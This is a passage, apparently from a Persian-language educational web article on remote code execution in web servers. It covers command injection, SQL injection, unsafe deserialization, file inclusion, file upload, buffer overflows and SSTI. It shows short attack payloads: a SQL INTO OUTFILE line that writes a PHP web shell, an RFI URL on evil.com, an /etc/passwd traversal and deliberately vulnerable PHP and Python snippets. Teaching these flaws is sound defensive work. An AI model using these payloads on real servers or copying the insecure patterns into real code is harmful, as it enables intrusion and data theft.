\u0633\u0631\u0648\u0631 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u0646\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647:<\/p>\n<ul>\n<li>\u0633\u0627\u0632\u0634 \u06a9\u0627\u0645\u0644 \u0633\u06cc\u0633\u062a\u0645<\/li>\n<li>\u0646\u0642\u0636 \u062f\u0627\u062f\u0647 \u0647\u0627<\/li>\n<li>\u0646\u0635\u0628 \u0628\u062f\u0627\u0641\u0632\u0627\u0631<\/li>\n<li>\u067e\u0634\u062a\u0648\u0627\u0646\u0647 \u0647\u0627\u06cc \u0645\u062f\u0627\u0648\u0645<\/li>\n<\/ul>\n<p>RCE \u06a9\u0646\u062a\u0631\u0644 \u0647\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0646\u0638\u0645 \u0648 \u0645\u06a9\u0627\u0646\u06cc\u0633\u0645 \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0631\u0627 \u0627\u0632 \u0628\u06cc\u0646 \u0645\u06cc \u0628\u0631\u062f \u0648 \u06a9\u0646\u062a\u0631\u0644 \u0633\u0637\u062d \u0627\u062f\u0627\u0631\u06cc \u0645\u0647\u0627\u062c\u0645 \u0631\u0627 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc \u062f\u0647\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A7%D9%86%D9%88%D8%A7%D8%B9_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_RCE_%D9%85%D8%B4%D8%AA%D8%B1%DA%A9_%D8%AF%D8%B1_%D8%B3%D8%B1%D9%88%D8%B1%D9%87%D8%A7%DB%8C_%D9%88%D8%A8\"><\/span>\n<p>  \u0627\u0646\u0648\u0627\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0645\u0634\u062a\u0631\u06a9 \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse2i2fx2wp6nax6x2tau.png\" alt=\"\u0627\u0646\u0648\u0627\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc RCE \u0645\u0634\u062a\u0631\u06a9 \u062f\u0631 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%AA%D8%B2%D8%B1%DB%8C%D9%82\"><\/span>\n<p>  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642:<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D9%81%D8%B1%D9%85%D8%A7%D9%86\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631 \u0648\u0631\u0648\u062f\u06cc \u0636\u0639\u06cc\u0641 \u0628\u0631\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0633\u0637\u062d \u0633\u06cc\u0633\u062a\u0645 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0645\u06cc \u06a9\u0646\u0646\u062f. \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u0645\u062b\u0627\u0644:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"nv\">$cmd<\/span> <span class=\"o\">=<\/span> <span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">'cmd'<\/span><span class=\"p\">];<\/span> <span class=\"nb\">system<\/span><span class=\"p\">(<\/span><span class=\"nv\">$cmd<\/span><span class=\"p\">);<\/span> <span class=\"cp\">?&gt;<\/span>\n<\/span><\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>URL \u0645\u0627\u0646\u0646\u062f <code>example.com\/vuln.php?cmd=whoami<\/code> \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0631\u0627 \u0645\u0633\u062a\u0642\u06cc\u0645\u0627\u064b \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.<\/p>\n<p><strong>\u0633\u0627\u06cc\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u062f\u06cc\u062f\u0647:<\/strong> node.js (\u0627\u0632 \u0637\u0631\u06cc\u0642 <code>child_process.exec()<\/code>) \u060c \u067e\u0627\u06cc\u062a\u0648\u0646 <code>os.system()<\/code>\u0628\u0634\u0631<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_SQL_%D8%A8%D9%87_RCE\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 SQL \u0628\u0647 RCE<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u062f\u0631 \u062d\u0627\u0644\u06cc \u06a9\u0647 \u062a\u0632\u0631\u06cc\u0642 SQL \u0628\u0647 \u0637\u0648\u0631 \u0645\u0639\u0645\u0648\u0644 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u0647\u0627 \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u0645\u06cc \u062f\u0647\u062f \u060c \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0628\u0647 RCE \u062a\u0628\u062f\u06cc\u0644 \u0634\u0648\u062f. \u0645\u062b\u0627\u0644:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight sql\"><code><span class=\"s1\">' UNION SELECT \"<?php system($_GET['<\/span?><span class=\"n\">cmd<\/span><span class=\"s1\">']);?&gt;\" INTO OUTFILE '<\/span><span class=\"o\">\/<\/span><span class=\"n\">var<\/span><span class=\"o\">\/<\/span><span class=\"n\">www<\/span><span class=\"o\">\/<\/span><span class=\"n\">html<\/span><span class=\"o\">\/<\/span><span class=\"n\">shell<\/span><span class=\"p\">.<\/span><span class=\"n\">php<\/span><span class=\"s1\">'\n<\/span><\/span><\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0627\u06cc\u0646 \u06cc\u06a9 \u067e\u0648\u0633\u062a\u0647 \u0648\u0628 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc \u06a9\u0646\u062f \u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u0639\u062f\u0627\u0645 \u06a9\u0627\u0645\u0644 \u0641\u0631\u0645\u0627\u0646 \u0645\u06cc \u062f\u0647\u062f.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_LDAP\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 LDAP<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u06a9\u0645\u062a\u0631 \u0631\u0627\u06cc\u062c \u0627\u0645\u0627 \u0628\u0647 \u0647\u0645\u0627\u0646 \u0627\u0646\u062f\u0627\u0632\u0647 \u06a9\u0634\u0646\u062f\u0647 \u0627\u0633\u062a. \u0646\u0645\u0627\u06cc\u0634 \u062f\u0627\u062f\u0647 \u0634\u062f\u06af\u0627\u0646 LDAP \u0646\u0627\u062f\u0631\u0633\u062a \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u062c\u0631\u06cc\u0627\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062f\u06cc\u062f \u0642\u0631\u0627\u0631 \u062f\u0647\u0646\u062f \u06cc\u0627 \u0628\u0627 \u0633\u0627\u06cc\u0631 \u0646\u0642\u0635 \u0647\u0627 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 RCE \u0632\u0646\u062c\u06cc\u0631 \u0634\u0648\u0646\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D8%B4%D8%AF%D9%86_%D9%86%D8%A7%D8%A7%D9%85%D9%86_%D9%BE%D8%B4%D8%AA%DB%8C_%D9%BE%D9%86%D9%87%D8%A7%D9%86\"><\/span>\n<p>  \u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646: \u067e\u0634\u062a\u06cc \u067e\u0646\u0647\u0627\u0646<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fidzeqbgtlzb7wdksxgg8.png\" alt=\"\u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<p>\u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627 \u0628\u062f\u0648\u0646 \u062a\u0623\u06cc\u06cc\u062f \u060c \u0648\u0631\u0648\u062f\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0631\u0627 \u0631\u0647\u0627 \u0645\u06cc \u06a9\u0646\u0646\u062f \u060c \u062f\u0631\u0647\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0634\u06cc\u0621 \u062f\u0644\u062e\u0648\u0627\u0647 \u0648 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0631\u0627 \u0628\u0627\u0632 \u0645\u06cc \u06a9\u0646\u0646\u062f.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D9%85%D8%AB%D8%A7%D9%84_%D8%AF%D8%B1_%D9%81%D9%84%D8%A7%D8%B3%DA%A9_%D9%BE%D8%A7%DB%8C%D8%AA%D9%88%D9%86\"><\/span>\n<p>  \u0645\u062b\u0627\u0644 \u062f\u0631 \u0641\u0644\u0627\u0633\u06a9 \u067e\u0627\u06cc\u062a\u0648\u0646:<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight python\"><code><span class=\"n\">user<\/span> <span class=\"o\">=<\/span> <span class=\"n\">pickle<\/span><span class=\"p\">.<\/span><span class=\"nf\">loads<\/span><span class=\"p\">(<\/span><span class=\"n\">base64<\/span><span class=\"p\">.<\/span><span class=\"nf\">b64decode<\/span><span class=\"p\">(<\/span><span class=\"n\">request<\/span><span class=\"p\">.<\/span><span class=\"n\">form<\/span><span class=\"p\">[<\/span><span class=\"sh\">'<\/span><span class=\"s\">payload<\/span><span class=\"sh\">'<\/span><span class=\"p\">]))<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u06cc\u06a9 \u0628\u0627\u0631 \u0633\u0627\u062e\u062a\u0647 \u0634\u062f\u0647 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0647\u0646\u06af\u0627\u0645 \u067e\u0631\u062f\u0627\u0632\u0634 \u0633\u0631\u0648\u0631 \u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.<\/p>\n<p><strong>\u0646\u06a9\u062a\u0647 \u06a9\u0627\u0647\u0634:<\/strong> \u0645\u0627\u0646\u0646\u062f \u0633\u0631\u06cc\u0627\u0644 \u0633\u0627\u0632\u06cc \u0628\u0648\u0645\u06cc \u0645\u0627\u0646\u0646\u062f <code>pickle<\/code> \u06cc\u0627 \u062c\u0627\u0648\u0627 <code>ObjectInputStream<\/code>\u0628\u0634\u0631 \u0627\u0632 \u0642\u0627\u0644\u0628 \u0647\u0627\u06cc \u0627\u0645\u0646 \u0645\u0627\u0646\u0646\u062f JSON \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f.<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%DA%AF%D9%86%D8%AC%D8%A7%D9%86%D8%AF%D9%86_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87_LFI_%D9%88_RFI\"><\/span>\n<p>  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647 (LFI \u0648 RFI)<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi8t8lg9q3yny4zchgjqq.png\" alt=\"\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<p>\u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u067e\u0648\u06cc\u0627 \u067e\u0631\u0648\u0646\u062f\u0647 \u0647\u0627 \u0631\u0627 \u0628\u0631 \u0627\u0633\u0627\u0633 \u0648\u0631\u0648\u062f\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0634\u0627\u0645\u0644 \u0645\u06cc \u0634\u0648\u0646\u062f:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"k\">include<\/span><span class=\"p\">(<\/span><span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">'page'<\/span><span class=\"p\">]<\/span><span class=\"mf\">.<\/span><span class=\"s2\">\".php\"<\/span><span class=\"p\">);<\/span> <span class=\"cp\">?&gt;<\/span>\n<\/span><\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f <strong>\u06af\u0646\u062c\u0627\u0646\u062f\u0646 \u067e\u0631\u0648\u0646\u062f\u0647 \u0645\u062d\u0644\u06cc<\/strong> (<code>..\/..\/etc\/passwd<\/code>) \u06cc\u0627 <strong>\u0634\u0645\u0648\u0644 \u067e\u0631\u0648\u0646\u062f\u0647 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631<\/strong> (<code>http:\/\/evil.com\/shell.txt<\/code>).<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C_%D9%87%D8%A7%DB%8C_%D8%A8%D8%A7%D8%B1%DA%AF%D8%B0%D8%A7%D8%B1%DB%8C_%D9%BE%D8%B1%D9%88%D9%86%D8%AF%D9%87\"><\/span>\n<p>  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0641\u0627\u06cc\u0644 \u0628\u062f\u0648\u0646 \u0627\u0631\u0632\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0647\u0627\u06cc \u0645\u062e\u0631\u0628 \u0631\u0627 \u0645\u0633\u062a\u0642\u0631 \u06a9\u0646\u0646\u062f:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight php\"><code><span class=\"nb\">move_uploaded_file<\/span><span class=\"p\">(<\/span><span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'tmp_name'<\/span><span class=\"p\">],<\/span> <span class=\"s2\">\"uploads\/\"<\/span><span class=\"mf\">.<\/span><span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'name'<\/span><span class=\"p\">]);<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u0627\u06af\u0631 <code>shell.php<\/code> \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a \u060c \u0645\u06cc \u062a\u0648\u0627\u0646 \u0622\u0646 \u0631\u0627 \u0622\u063a\u0627\u0632 \u06a9\u0631\u062f:<\/p>\n<p><code>example.com\/uploads\/shell.php?cmd=ls<\/code><\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%B3%D8%B1%D8%B1%DB%8C%D8%B2_%D8%A8%D8%A7%D9%81%D8%B1_%D9%82%D8%AF%DB%8C%D9%85%DB%8C_%D8%A7%D9%85%D8%A7_%D8%B7%D9%84%D8%A7\"><\/span>\n<p>  \u0633\u0631\u0631\u06cc\u0632 \u0628\u0627\u0641\u0631: \u0642\u062f\u06cc\u0645\u06cc \u0627\u0645\u0627 \u0637\u0644\u0627<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u063a\u0627\u0644\u0628\u0627\u064b \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u06cc \u06a9\u062f \u0628\u0648\u0645\u06cc \u060c \u0633\u0631\u0631\u06cc\u0632 \u0628\u0627\u0641\u0631 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc \u062f\u0647\u062f \u062a\u0627 \u062d\u0627\u0641\u0638\u0647-\u0627\u0632 \u062c\u0645\u0644\u0647 \u0622\u062f\u0631\u0633 \u0647\u0627\u06cc \u0628\u0627\u0632\u06af\u0634\u062a-\u0631\u0627 \u0628\u0631\u0627\u06cc \u0646\u0648\u0634\u062a\u0646 \u062c\u0631\u06cc\u0627\u0646 \u06a9\u0646\u062a\u0631\u0644 \u0648 \u0627\u062c\u0631\u0627\u06cc \u067e\u0648\u0633\u062a\u0647 \u067e\u0648\u0633\u062a\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647 \u060c \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u06a9\u0646\u0646\u062f.<\/p>\n<p>\u06af\u0631\u0686\u0647 \u062f\u0631 \u0686\u0627\u0631\u0686\u0648\u0628 \u0647\u0627\u06cc \u0648\u0628 \u0633\u0637\u062d \u0628\u0627\u0644\u0627 \u0646\u0627\u062f\u0631 \u0627\u0633\u062a \u060c \u0627\u0645\u0627 \u0627\u06cc\u0646 \u0645\u0648\u0627\u0631\u062f \u0647\u0645\u0686\u0646\u0627\u0646 \u0645\u0631\u062a\u0628\u0637 \u0647\u0633\u062a\u0646\u062f <strong>\u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0648\u0628 \u062c\u0627\u0633\u0627\u0632\u06cc \u0634\u062f\u0647<\/strong>\u0628\u0627 <strong>C\/C ++ Backends<\/strong>\u060c \u06cc\u0627 <strong>\u067e\u0627\u0646\u0644 \u0647\u0627\u06cc \u0645\u062f\u06cc\u0631 IoT<\/strong>\u0628\u0634\u0631<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%AA%D8%B2%D8%B1%DB%8C%D9%82_%D8%A7%D9%84%DA%AF%D9%88%DB%8C_%D8%B3%D9%85%D8%AA_%D8%B3%D8%B1%D9%88%D8%B1_SSTI\"><\/span>\n<p>  \u062a\u0632\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631 (SSTI)<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftnlkymfi01v5lpouobbh.png\" alt=\"\u062a\u0632\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u06cc \u0633\u0645\u062a \u0633\u0631\u0648\u0631\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<p>\u0645\u062d\u0628\u0648\u0628 \u062f\u0631 Jinja2 Python \u06cc\u0627 Ruby&#39;s ERB \u060c SSTI \u0647\u0646\u06af\u0627\u0645\u06cc \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc \u0627\u0641\u062a\u062f \u06a9\u0647 \u0648\u0631\u0648\u062f\u06cc \u06a9\u0627\u0631\u0628\u0631 \u062f\u0631 